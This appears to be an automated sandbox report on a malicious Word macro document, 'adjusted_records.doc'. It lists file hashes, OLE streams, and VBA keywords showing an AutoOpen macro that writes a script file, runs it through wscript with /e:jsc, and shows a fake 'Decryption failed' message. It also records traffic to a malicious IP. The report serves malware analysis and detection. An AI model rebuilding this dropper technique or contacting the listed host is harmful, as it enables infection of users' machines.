SHA-512: | 9C22ABE3CAB4E7115BD3C61996185EF93CA870E9E1C3165C01AF6DFEE111A45D06631269ED1102933D54C092FD454DC795195B6A02937A783477AE879B6079EE |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | B44447513CD72AB280BD753AE380183B |
SHA1: | 49844631D7E09595279C6EF76DBEF7414CF5D0F7 |
SHA-256: | 86855EE4764321EF557FEFB715A50F988FC8F77CBB83B3923932DF3280E4BDBF |
SHA-512: | 5F23942630AE21F75FB8DE783A515C76C0F1528BD47EFD86261F94E8E01EADB301E814BA594785A8C9073D4861ACE2C13B3E558F1E2CE393FA98E14300BB6BEB |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | 33DBB67576DE33CF6C5AB020315007BF |
SHA1: | D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E |
SHA-256: | 67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64 |
SHA-512: | 8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | AAAFB05B0ADDF2B744EECDC2C757CB90 |
SHA1: | F7654885E85A3AA2998D6E966E838EF25B43B8BD |
SHA-256: | 44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F |
SHA-512: | 4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268 |
Malicious: | true |
Reputation: | low |
File Type: | |
MD5: | 33DBB67576DE33CF6C5AB020315007BF |
SHA1: | D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E |
SHA-256: | 67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64 |
SHA-512: | 8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956 |
Malicious: | false |
Reputation: | low |
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
85.93.2.148 | Germany | 203913 | ARCOMPUS-MEDIANET-ASLB | true |
Static File Info |
---|
General | |
---|---|
File type: | |
TrID: |
|
File name: | adjusted_records.doc |
File size: | 545280 |
MD5: | a00ae556a61907d43332449169c88844 |
SHA1: | 74ab28527e0fd7009365018ff6a6eea63fc75a75 |
SHA256: | 84dc0382a4c32cc54a5e92929827f97ee3ceaa50bee6c0831069e78c1144ee30 |
SHA512: | 1e180b6c4f74dfddaabe74570abd1f059002c1c2fc2fc48f8d26fe66f8d125ffd95e3adc0b315e4ff8e15d364959f4bf7cf39e74f9a1b4c6e269cd36c69f8e62 |
File Content Preview: | ........................>......................./...........2...............(...)...*...+...,...-.......I...J.................................................................................................................................................. |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "adjusted_records.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Template: | |
Last Saved By: | |
Revion Number: | 2 |
Total Edit Time: | 0 |
Create Time: | 2017-11-08 15:35:00 |
Last Saved Time: | 2017-11-08 15:35:00 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 1 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 3135 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 3135 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . ( . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 1c 01 00 00 c0 04 00 00 00 01 00 00 06 02 00 00 ff ff ff ff c7 04 00 00 a7 08 00 00 39 09 00 00 00 00 00 00 01 00 00 00 ca 5e a6 a9 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 34 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
True) |
ivwubka, |
armando() |
VB_Name |
VB_Creatable |
StrReverse("ini.daphsarc\") |
VB_Exposed |
ikgygke |
"d.exe |
avfasci.OpenTextFile(ikgygke, |
ygtekra.Close |
VB_TemplateDerived |
(ByVal |
failed! |
AutoOpen() |
ivwubka |
armando |
again" |
Long) |
"ript.exe |
VB_Customizable |
Split(vbspbopegh, |
dwMilliseconds |
CreateObject("Scripting.FileSystemObject") |
vbspbopegh |
ygtekra.WriteLine |
agluksad |
icrobbab |
ygtekra |
avfasci |
"Decryption |
/e:jsc" |
"|*|") |
PtrSafe |
"ript |
Declare |
pbopegh |
"ThisDocument" |
False |
Attribute |
dacxitj |
Private |
Shell |
VB_PredeclaredId |
Sleep |
VB_GlobalNameSpace |
VB_Base |
knyvlaql |
MsgBox |
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1331 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1331 |
Data ASCII: | . . . . . . . . . Z . . . . . . . P . . . . . . . a . . . . . . . G . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f4 00 00 00 5a 03 00 00 d8 00 00 00 50 02 00 00 ff ff ff ff 61 03 00 00 b5 03 00 00 47 04 00 00 00 00 00 00 01 00 00 00 ca 5e d7 d1 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.2359563651 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | Unicode text, UTF-32, big-endian |
Stream Size: | 4096 |
Entropy: | 0.244062958454 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | Unicode text, UTF-32, big-endian |
Stream Size: | 4096 |
Entropy: | 0.393283840733 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . M i c r o s o f t O f f i c e |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 1c 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 07 00 00 00 88 00 00 00 08 00 00 00 9c 00 00 00 09 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 0a 00 00 00 d8 00 00 00 0c 00 00 00 e4 00 00 00 0d 00 00 00 f0 00 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 6949 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | data |
Stream Size: | 6949 |
Entropy: | 5.92751627912 |
Base64 Encoded: | True |
Data ASCII: | j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
Data Raw: | 6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 393799 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 393799 |
Entropy: | 7.7413813421 |
Base64 Encoded: | True |
Data ASCII: | G . . . D . d . . . . . . . . . . . . . . . . . . . . . . H . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . C . . . ( . . . . A . . . . . . . . . . . . . . . . . . . . . . p . r . o . p . a . r . k . . . . . . . . . . . . . . . R . . . . . . . . . % . . . . L . ] X ` . . . . . ! . . . . . . . . . . D . . . . . = . . F . . { . . . % . . . . L . ] X ` . . . . . ! . . . . . . . E x i f . . I I * . . . . . . . . . . . . . . . . . D u c |
Data Raw: | 47 02 06 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 48 c6 66 80 02 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4c 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 28 00 00 00 04 41 01 00 00 00 05 c1 10 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 70 00 72 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 492 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF, CR line terminators |
Stream Size: | 492 |
Entropy: | 5.34368161244 |
Base64 Encoded: | True |
Data ASCII: | I D = " { F 9 A 5 5 E B 6 - 9 0 E 9 - 4 8 2 4 - 8 9 0 4 - 4 D 7 C 9 8 8 8 E 4 D 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 D B 2 A 0 A 2 E 0 A 2 E 0 A 2 E 0 A 2 E " . . D P B = " 6 6 6 |
Data Raw: | 49 44 3d 22 7b 46 39 41 35 35 45 42 36 2d 39 30 45 39 2d 34 38 32 34 2d 38 39 30 34 2d 34 44 37 43 39 38 38 38 45 34 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00 |
Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF, CR line terminators |
Stream Size: | 291 |
Entropy: | 4.6035537314 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 1 3 3 7 . . C l i e n t L e f t = 2 1 . . C l i e n t T o p = 3 2 2 . . C l i e n t W i d t h = 2 1 9 8 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/f |
File Type: | data |
Stream Size: | 94 |
Entropy: | 2.63195667756 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . } . . % . . . 6 . . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . . . . . . . . . |
Data Raw: | 00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 25 0f 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 84 b7 01 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d5 00 00 00 00 00 00 00 |
Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 112516 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/o |
File Type: | data |
Stream Size: | 112516 |
Entropy: | 3.79176326 |
Base64 Encoded: | True |
Data ASCII: | . . . . ( . . . T . . . / * | * | * C o p y r i g h t 2 0 0 5 G o o g l e , I n c . . | * | * A l l r i g h t s r e s e r v e d . | * | * v . 1 . 8 3 | * | * / | * | v a r j b o s y p t a n l e b i m e z u l z y m u t y b n u d m a z m a m o z t a n w i v o q s u m u f u q u q f a r u q m y z t y p i g e r u s x o n k y p y g u w f y f o q e c l a d y v u r h e m w i d f o j i m a d h u r y t s u n t e c s e g x a p a b n e k i f o b e t b i t o v e t o w y x t y b y l j a |
Data Raw: | 00 02 08 00 28 00 00 00 54 b7 01 80 2f 2a 7c 2a 7c 20 2a 20 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 35 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2e 7c 2a 7c 20 2a 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 7c 2a 7c 20 2a 20 20 76 2e 20 31 2e 38 33 7c 2a 7c 20 2a 2f 7c 2a 7c 76 61 72 20 6a 62 6f 73 79 70 74 61 6e 6c 65 62 69 6d 65 7a 75 6c 7a 79 6d 75 74 79 62 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3522 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3522 |
Entropy: | 4.38132542916 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 97 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 810 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 810 |
Entropy: | 6.50619704379 |
Base64 Encoded: | True |
Data ASCII: | . & . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . C . [ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . | . . [ . |
Data Raw: | 01 26 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 c7 43 d7 5b 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 1.06127588563 |
Base64 Encoded: | False |
Data ASCII: | . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | ec a5 c1 00 5f c0 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 0e 00 00 62 7f 00 00 62 7f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2017 14:01:03.588519096 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.588606119 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:03.588782072 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.646631002 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.646661997 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835303068 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835351944 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835552931 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:04.842401981 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:04.842434883 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.843794107 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.044481039 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.044622898 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186239958 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186414957 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186770916 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.959671021 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.959749937 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.959947109 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.964972019 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.965003967 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452359915 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452394009 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452946901 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.454158068 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.454202890 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.455718040 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.656451941 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.657588959 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894402027 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894623041 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894886017 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.414731026 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.616456032 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
